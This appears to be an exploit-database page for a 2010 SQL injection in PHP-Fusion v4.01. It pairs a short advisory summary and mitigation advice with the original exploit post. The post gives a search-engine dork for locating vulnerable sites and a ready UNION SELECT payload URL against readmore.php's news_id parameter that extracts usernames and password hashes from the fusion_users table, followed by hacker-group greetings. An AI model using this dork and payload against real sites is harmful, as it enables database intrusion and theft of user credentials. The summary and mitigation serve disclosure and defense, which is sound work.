header-logo
Suggest Exploit
vendor:
PHP-Fusion
by:
Ma3sTr0-Dz
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP-Fusion
Affected Version From: 4.01
Affected Version To: 4.01
Patch Exists: NO
Related CWE: N/A
CPE: a:php-fusion:php-fusion:4.01
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2010

PHP-Fusion v4.01 SQL INJECTION Vulnerabilities

A SQL injection vulnerability exists in PHP-Fusion v4.01. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database. The vulnerability is due to insufficient sanitization of user-supplied input in the 'news_id' parameter of the 'readmore.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, the application should be configured to use the least privileged user account with the least amount of privileges necessary to perform its functions.
Source

Exploit-DB raw data:

# Exploit Title: PHP-Fusion v4.01 SQL INJECTION Vulnerabilities

# Date: 17/05/2010

# Author: Ma3sTr0-Dz

# Software Link: http://www.php-fusion.co.uk

# Version: 4.01

# CVE : N/A

# Code : [exploit code]

=======================================================PHP-Fusion v4.01 SQL INJECTION Vulnerabilities=======================================================############################################################## Name: PHP-Fusion v4.01 SQL INJECTION Vulnerabilities .
# Vendor: www.php-fusion.co.uk# Date: 2010/05/17# Author: Ma3sTr0-Dz# Home : Www.Sec4ever.Com
# Contact: o5m@Hotmail.de#############################################################

# Part Expl0it & Bug Codes :

---
Dork : allinurl:readmore.php?news_id

http://site.com/readmore.php?news_id=readmore.php?news_id=-1%20'UNION%20SELECT%201,user_name,3,user_password,5,6,7,8,9,10,11%20from%20fusion_users/*

# Thanks to: Cmos_Clr -
 Hard_Hakerz- Sa4D - Mahmoud_SQL - RA3CH - His0k4 - Virus_Hacker_Dz - 
HCJ 



  g0x - Heart_Hunter - D4dy - all sec4ever members & algerian hackers !